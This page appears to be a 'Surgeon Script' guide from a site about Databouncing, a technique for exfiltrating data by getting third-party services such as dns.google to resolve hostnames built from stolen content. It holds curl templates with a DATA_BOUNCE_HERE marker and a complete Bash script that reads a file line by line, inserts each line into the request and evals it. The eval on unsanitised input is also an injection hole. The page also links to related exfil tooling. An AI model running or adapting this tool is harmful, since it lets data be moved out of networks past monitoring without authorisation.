Surgeon Script

  • @site.url: https://databouncing.io
  • path: /surgeon-script/
  • excerpt: Working with specific parameters within web requests to Databounce
  • published date:
  • reading time: 3 minutes
  • tag: Guides
  • authors: JC

The majority of Databouncing has been focused on headers, that's good, that's it's biggest broadest example, but we wanted to extend the capability to specific requests, so if you have a hostname that is processed in a parameter (think SSRF or open redirect) we can give you something to work with there, this script will only send in a position, this means that breaking the file down and rebuilding the file is on you, something that we have covered in other tools from Nick and Jakoby, but those are focused on headers, this is a starter for 10, it's Bash, we look at using a web service , DNS tools from google, in a HTTPS request, that ultimately performs a DNS lookup on a domain of our choosing, that's supposed to do that, and that's what we will take advantage of in this example

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: dns.google' -H $'Sec-Ch-Ua: \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"macOS\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Priority: u=0, i' -H $'Connection: keep-alive' \
    $'https://dns.google/resolve?name=databouncing.io&type=txt'

Curl dns.google

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: dns.google' -H $'Sec-Ch-Ua: \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"macOS\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Priority: u=0, i' -H $'Connection: keep-alive' \
    $'https://dns.google/resolve?name=DATA_BOUNCE_HERE&type=txt'

You can now see clearly the DATA_BOUNCE_HERE marker, the rest of the work would be the supporting requirements such as ensuring each line of what is being sent in data.txt allows for a successful rebuild and is hostname RFC compliant

Moving forward, we may introduce this individual capability into a bigger application, but it's food for thought, and there's a lot to think about when thinking about the dexterity of Databouncing within it's application and value.

This pays very crude homage to the Burpsuite Pro intruder markers in burp suite it would be §DATA_BOUNCE_HERE§, We can't expect everyone to buy burp suite, and we're not quite ready for a full application with it's features, a side note while we're mentioning application security related tooling, it will be interesting to see how this method ferments in the application security space, as well as the offensive space. 

#!/bin/bash

# Function to check if a command exists
command_exists() {
    type "$1" &> /dev/null
}

# Preflight check for necessary commands (curl and sed)
if ! command_exists curl; then
    echo "Error: curl is not installed. Please install curl and try again."
    exit 1
fi

if ! command_exists sed; then
    echo "Error: sed is not installed. Please install sed and try again."
    exit 1
fi

# Check if sufficient arguments are provided
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 'curl_command_template' 'file_path'"
    exit 1
fi

# First argument is the cURL command template
curl_command_template=$1

# Second argument is the path to the file
file_path=$2

# Check if the file exists
if [ ! -f "$file_path" ]; then
    echo "Error: File not found at $file_path"
    exit 1
fi

# Reading each line from the file
while IFS= read -r line
do
    # Replace the placeholder with the current line
    modified_curl_command=$(echo "$curl_command_template" | sed "s/DATA_BOUNCE_HERE/$line/")

    # Execute the cURL command
    eval "$modified_curl_command"

    # Optional: Output the status or any response
    echo "Processed line: $line"
done < "$file_path"

echo "All lines have been processed."

More on this topic

Web Headers (HLD)

  • date published:
  • reading-time: 1 min read
  • authors:
Mermaid Diagram Journey of Databouncing with HTTP Web Headers via trusted web servers and ultimately handed over to the exfil DNS

Data Bouncing With Jakoby

  • date published:
  • reading-time: 2 min read
  • authors:
Data Bouncing - PowerShell Version via Jakoby (Unit-259) - this version uses Hex in the hostname and defaults to a public interactsh (so you dont need your own DNS listener)

Identifying Candidates

  • date published:
  • reading-time: 2 min read
  • authors:
Example One is a glimpse into what is needed to identify DataBouncing Candidates Recruiter - Send stuff Interactsh - Listen for stuff Target List - Stuff to be sent

Bouncing with Nick Dunn

  • date published:
  • reading-time: 2 min read
  • authors:
When we where conceptualizing data bouncing, Nick rolled his sleeves top and put together the first set of reliable python tools to get data out and rebuilt via databouncing, this is achieved over four scripts - https://github.com/N1ckDunn/DataBouncing/tree/main